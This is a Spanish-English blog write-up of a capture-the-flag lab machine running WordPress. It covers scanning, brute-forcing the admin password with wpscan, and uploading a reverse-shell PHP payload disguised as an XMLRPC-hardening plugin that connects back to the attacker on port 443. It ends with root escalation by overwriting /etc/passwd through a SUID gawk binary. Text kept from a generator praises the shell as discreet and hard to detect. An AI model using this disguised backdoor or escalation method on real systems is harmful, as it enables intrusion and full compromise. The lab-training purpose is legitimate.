MACHINE BAD PLUGIN

December 28, 2025

BAD PLUGIN

┌──(kali㉿kali)-[~/Descargas/badplugin]
└─$ sudo bash auto_deploy.sh badplugin.tar
[sudo] contraseña para kali:

## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/

___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]

Estamos desplegando la máquina vulnerable, espere un momento.
422be289323d1e2ca6c8cc98917c0d8ab6bc951313d09c8002a5c82bfb8c0ddd

Máquina desplegada, su dirección IP es --> 192.168.1.100

Presiona Ctrl+C cuando termines con la máquina para eliminarla

Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 80 (HTTP) was open.

┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -sS 192.168.1.100 -vvv 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-08 14:13 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 14:13
Scanning 192.168.1.100 [1 port]
Completed ARP Ping Scan at 14:13, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:13
Scanning 192.168.1.100 [65535 ports]
Discovered open port 80/tcp on 192.168.1.100
Completed SYN Stealth Scan at 14:13, 0.72s elapsed (65535 total ports)
Initiating Service scan at 14:13
Scanning 1 service on 192.168.1.100
Completed Service scan at 14:14, 6.03s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.1.100.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 14:14
Completed NSE at 14:14, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 14:14
Completed NSE at 14:14, 0.01s elapsed
Nmap scan report for 192.168.1.100
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-11-08 14:13:58 CET for 7s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 02:42:C0:A8:01:64 (Unknown)

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.27 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Now, let's go to scanning with dirb toolkit to get the information in this webpahe as you can see below.

┌──(root㉿kali)-[/home/kali]
└─# dirb "http://192.168.1.100/"
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 8 14:15:07 2025
URL_BASE: http://192.168.1.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------
GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.100/ ----
+ http://192.168.1.100/index.html (CODE:200|SIZE:1960)
+ http://192.168.1.100/info.php (CODE:200|SIZE:87273)
==> DIRECTORY: http://192.168.1.100/javascript/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/
+ http://192.168.1.100/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.100/wordpress/

---- Entering directory: http://192.168.1.100/javascript/ ----
==> DIRECTORY: http://192.168.1.100/javascript/jquery/

---- Entering directory: http://192.168.1.100/phpmyadmin/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/doc/
+ http://192.168.1.100/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.1.100/phpmyadmin/index.php (CODE:200|SIZE:18605)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/
+ http://192.168.1.100/phpmyadmin/libraries (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/
+ http://192.168.1.100/phpmyadmin/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/sql/
+ http://192.168.1.100/phpmyadmin/templates (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/

---- Entering directory: http://192.168.1.100/wordpress/ ----
+ http://192.168.1.100/wordpress/index.php (CODE:200|SIZE:168442)
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-includes/
+ http://192.168.1.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.1.100/javascript/jquery/ ----
+ http://192.168.1.100/javascript/jquery/jquery (CODE:200|SIZE:289782)

---- Entering directory: http://192.168.1.100/phpmyadmin/doc/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/doc/html/

---- Entering directory: http://192.168.1.100/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/config/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/vendor/

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ar/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/az/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/be/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/bg/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ca/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/cs/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/da/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/de/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/el/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/es/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/et/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/fi/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/fr/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/gl/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/hu/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ia/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/id/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/it/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ja/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ko/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/nl/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/pl/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/pt/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/pt_BR/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ro/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ru/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/si/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/sk/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/sl/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/sq/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/sv/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/tr/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/uk/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/vi/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/zh_CN/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/zh_TW/

---- Entering directory: http://192.168.1.100/phpmyadmin/sql/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/

---- Entering directory: http://192.168.1.100/wordpress/wp-admin/ ----
+ http://192.168.1.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/includes/
+ http://192.168.1.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/user/

---- Entering directory: http://192.168.1.100/wordpress/wp-content/ ----
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/cache/
+ http://192.168.1.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/languages/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/uploads/

---- Entering directory: http://192.168.1.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/phpmyadmin/doc/html/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/doc/html/_images/

---- Entering directory: http://192.168.1.100/phpmyadmin/js/config/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/database/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/server/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/setup/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/table/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/transformations/

---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/database/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/server/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/setup/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/table/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/transformations/

---- Entering directory: http://192.168.1.100/phpmyadmin/js/vendor/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/vendor/jquery/

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ar/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/az/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/be/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/bg/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ca/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/cs/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/da/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/de/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/el/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/es/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/et/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/fi/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/fr/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/gl/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/hu/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ia/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/id/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/it/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ja/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ko/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/nl/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/pl/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/pt/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/pt_BR/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ro/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ru/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/si/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/sk/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/sl/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/sq/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/sv/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/tr/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/uk/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/vi/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/zh_CN/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/locale/zh_TW/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/img/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/jquery/

---- Entering directory: http://192.168.1.100/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/wordpress/wp-admin/network/ ----
+ http://192.168.1.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.100/wordpress/wp-admin/user/ ----
+ http://192.168.1.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.100/wordpress/wp-content/cache/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/wordpress/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/wordpress/wp-content/plugins/ ----
+ http://192.168.1.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.100/wordpress/wp-content/themes/ ----
+ http://192.168.1.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.100/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.100/phpmyadmin/doc/html/_images/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/database/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/server/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/server/status/

---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/setup/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/table/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/transformations/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/database/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/server/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/server/status/

---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/setup/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/table/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/transformations/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/vendor/jquery/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/css/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/img/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/jquery/images/

---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/server/status/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/server/status/ ----

---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/jquery/images/ ----

-----------------
END_TIME: Sat Nov 8 14:16:41 2025
DOWNLOADED: 350512 - FOUND: 20

┌──(root㉿kali)-[/home/kali]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.100 escolares.dl
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

We can see in the picture below this is wordpress because is xmlprc.

http://escolares.dl/wordpress/
http://192.168.1.100/wordpress/wp-admin/
http://escolares.dl/wordpress/xmlrpc.php
http://192.168.1.100/wordpress/wp-admin/
http://escolares.dl/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.100%2Fwordpress%2Fwp-admin%2F&reauth=1
http://escolares.dl/wordpress/wp-login.php"

As we have login panel we are trying obtain the credentials as you can see below.

This part is so important becuase we hsve obtain banner grabbing which we get default user (admin).

We can see if we can write user admin and password admin123.

In addition, we can see with this command as we have obtained the password.

Credentials:

Username: admin

Password: rockyou

┌──(root㉿kali)-[/home/kali]
└─# wpscan --url "http://escolares.dl/wordpress/wp-login.php" -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.28

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://escolares.dl/wordpress/wp-login.php/ [192.168.1.100]
[+] Started: Sat Nov 8 14:24:56 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.58 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] WordPress readme found: http://escolares.dl/wordpress/wp-login.php/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] This site seems to be a multisite
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| Reference: http://codex.wordpress.org/Glossary#Multisite

[+] The external WP-Cron seems to be enabled: http://escolares.dl/wordpress/wp-login.php/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Insecure, released on 2024-11-21).
| Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://escolares.dl/wordpress/wp-includes/css/dashicons.min.css?ver=6.7.1
| Confirmed By:
| Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://escolares.dl/wordpress/wp-includes/css/buttons.min.css?ver=6.7.1
| - http://escolares.dl/wordpress/wp-includes/js/wp-util.min.js?ver=6.7.1
| Query Parameter In Install Page (Aggressive Detection)
| - http://escolares.dl/wordpress/wp-includes/css/dashicons.min.css?ver=6.7.1
| - http://escolares.dl/wordpress/wp-includes/css/buttons.min.css?ver=6.7.1
| - http://escolares.dl/wordpress/wp-admin/css/forms.min.css?ver=6.7.1
| - http://escolares.dl/wordpress/wp-admin/css/l10n.min.css?ver=6.7.1

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:19 <====================> (137 / 137) 100.00% Time: 00:00:19

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / rockyou
Trying admin / abc123 Time: 00:00:00 < > (10 / 14344402) 0.00% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: admin, Password: rockyou

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 8 14:25:27 2025
[+] Requests Done: 345
[+] Cached Requests: 4
[+] Data Sent: 101.104 KB
[+] Data Received: 24.142 MB
[+] Memory used: 268.695 MB
[+] Elapsed time: 00:00:30

Now, we have to create access to wordpress with this script as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nano reverse.php
<?php
/*
Plugin Name: Restrict XMLRPC Access
Plugin URI: https://elrincondelhacker.es/
Description: Restringe el acceso al archivo xmlrpc.php para aumentar la seguridad.
Version: 1.0
Author: El Pinguino de Mario
Author URI: https://elpinguinodemario.es/
License: GPL2
*/

function restrict_xmlrpc_access() {
if (strpos($_SERVER['REQUEST_URI'], 'xmlrpc.php') !== false) {
header('HTTP/1.1 403 Forbidden');
echo 'Cuidadito cuidadín, te pillé leyendo lo que no debías pillín.';

// Configuración de la conexión inversa
$config = [
'ip' => '192.168.1.1', // IP del atacante
'port' => 443, // Puerto de escucha del atacante
'chunk_size' => 1400
];

// Establecer conexión de socket
$sock = @fsockopen($config['ip'], $config['port'], $errno, $errstr, 30);
if (!$sock) {
error_log("ERROR: No se pudo conectar a {$config['ip']}:{$config['port']} - $errstr ($errno)");
exit(1);
}

// Abrir shell y redirigir entrada/salida a la conexión de socket
$process = proc_open('/bin/sh -i', [
0 => $sock, // Entrada estándar
1 => $sock, // Salida estándar
2 => $sock // Salida de error
], $pipes);
if (!is_resource($process)) {
error_log("ERROR: No se pudo abrir la shell.");
fclose($sock);
exit(1);
}

// Manejar la comunicación de datos
stream_set_blocking($sock, 0);
while ($data = fread($sock, $config['chunk_size'])) {
fwrite($sock, $data);
}

// Cerrar recursos
fclose($sock);
proc_close($process);
exit;
}
}

add_action('init', 'restrict_xmlrpc_access');

Mejoras Realizadas:

Configuración en un Array: He movido las configuraciones de la conexión inversa a un array $config para una mejor organización y facilidad de modificación.
Manejo de Errores Mejorado: Se han añadido mensajes de error más descriptivos para facilitar el diagnóstico en caso de fallo.
Bloqueo de Stream: He añadido stream_set_blocking($sock, 0); para que la lectura del socket sea no bloqueante, lo que mejora la eficiencia y la capacidad de respuesta del script.
Optimización del Bucle de Comunicación: El bucle de comunicación de datos se ha simplificado y optimizado para manejar mejor el flujo de datos entre el socket y la shell.

Este código debería ser más eficiente y discreto, facilitando la ejecución de tu ataque sin ser detectado fácilmente.

Now, we can see below as it has been created in /home/kali
┌──(root㉿kali)-[/home/kali]
└─# ls
Descargas Documentos Escritorio Imágenes Música Plantillas Público reverse.php Vídeos

In addition, we have seen reverse shell have to be changed to zip file unless we cannot upload to wordpress.
┌──(root㉿kali)-[/home/kali]
└─# zip -r reverse.zip reverse.php
adding: reverse.php (deflated 53%)

┌──(root㉿kali)-[/home/kali]
└─# ls
Descargas Escritorio Música Público reverse.zip
Documentos Imágenes Plantillas reverse.php Vídeos

We have to open port to receive the reverse shell as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.1.1] from escolares.dl [192.168.1.100] 56990
/bin/sh: 0: can't access tty; job control turned off
$ sh: turning off NDELAY mode
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@a1c2470680a5:/var/www/html/wordpress$ ^Z
zsh: suspended nc -lvp 443

┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo;fg
[1] + continued nc -lvp 443
reset xterm
www-data@a1c2470680a5:/var/www/html/wordpress$ ^Z
www-data@a1c2470680a5:/var/www/html/wordpress$ export SHELL=BASH
www-data@a1c2470680a5:/var/www/html/wordpress$ export TERM=xterm
www-data@a1c2470680a5:/var/www/html/wordpress$ sudo -l
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
sudo: 3 incorrect password attempts
www-data@a1c2470680a5:/var/www/html/wordpress$

www-data@a1c2470680a5:/var/www/html/wordpress$ ls
index.php wp-blog-header.php wp-cron.php wp-mail.php
license.txt wp-comments-post.php wp-includes wp-settings.php
readme.html wp-config-sample.php wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php wp-load.php wp-trackback.php
wp-admin wp-content wp-login.php xmlrpc.php
www-data@a1c2470680a5:/var/www/html/wordpress$ cd ..
www-data@a1c2470680a5:/var/www/html$ ls
index.html info.php wordpress
www-data@a1c2470680a5:/var/www/html$ cd ..
www-data@a1c2470680a5:/var/www$ ls
html
www-data@a1c2470680a5:/var/www$ cd ..
www-data@a1c2470680a5:/var$ ls
backups cache lib local lock log mail opt run spool tmp www
www-data@a1c2470680a5:/var$ cd ..
www-data@a1c2470680a5:/$ ls
bin etc lib64 proc sbin.usr-is-merged usr
bin.usr-is-merged home media root srv var
boot lib mnt run sys
dev lib.usr-is-merged opt sbin tmp
www-data@a1c2470680a5:/$

www-data@a1c2470680a5:/$ ls
bin etc lib64 proc sbin.usr-is-merged usr
bin.usr-is-merged home media root srv var
boot lib mnt run sys
dev lib.usr-is-merged opt sbin tmp
www-data@a1c2470680a5:/$ cd /home/
www-data@a1c2470680a5:/home$ ls
ubuntu
www-data@a1c2470680a5:/home$ cd ubuntu/
bash: cd: ubuntu/: Permission denied
www-data@a1c2470680a5:/home$
www-data@a1c2470680a5:/$ cd /opt/
www-data@a1c2470680a5:/opt$ ls

www-data@a1c2470680a5:/opt$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/passwd
/usr/bin/gawk
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

As we have acess to modify with gawk we will proceed with this next steps:

1. Going to /opt

2. cp /etc/passwd .

3. Modify copy /etc/passwd and remove password to root user.

www-data@a1c2470680a5:/opt$

www-data@91e20a37658b:/$ cd /tmp/

www-data@91e20a37658b:/tmp$ cp /etc/passwd .
www-data@91e20a37658b:/tmp$ ls
passwd

root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin

4. Use command /usr/bin/gawk '{ print > "/etc/passwd"}' passwd to convert the real file in our file which has been changed and then we will be able to be root without introduce root password as you can see below.

www-data@91e20a37658b:/tmp$ /usr/bin/gawk '{ print > "/etc/passwd"}' passwd
www-data@91e20a37658b:/tmp$ cat /etc/passwd

www-data@91e20a37658b:/tmp$ su root
root@91e20a37658b:/tmp#

root@91e20a37658b:/tmp# whoami
root
root@91e20a37658b:/tmp#
Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Search This Blog

Hora actual en
Madrid, España

CYBERSECURITY

MACHINE BAD PLUGIN

BAD PLUGIN

Comments

Post a Comment

Entradas Populares

INTERNAL

TOR WEB BROWSER

activedirectory

PICKLE RICK

Metasploit Framework

HOSTING

LOVE

CHANGE MACHINE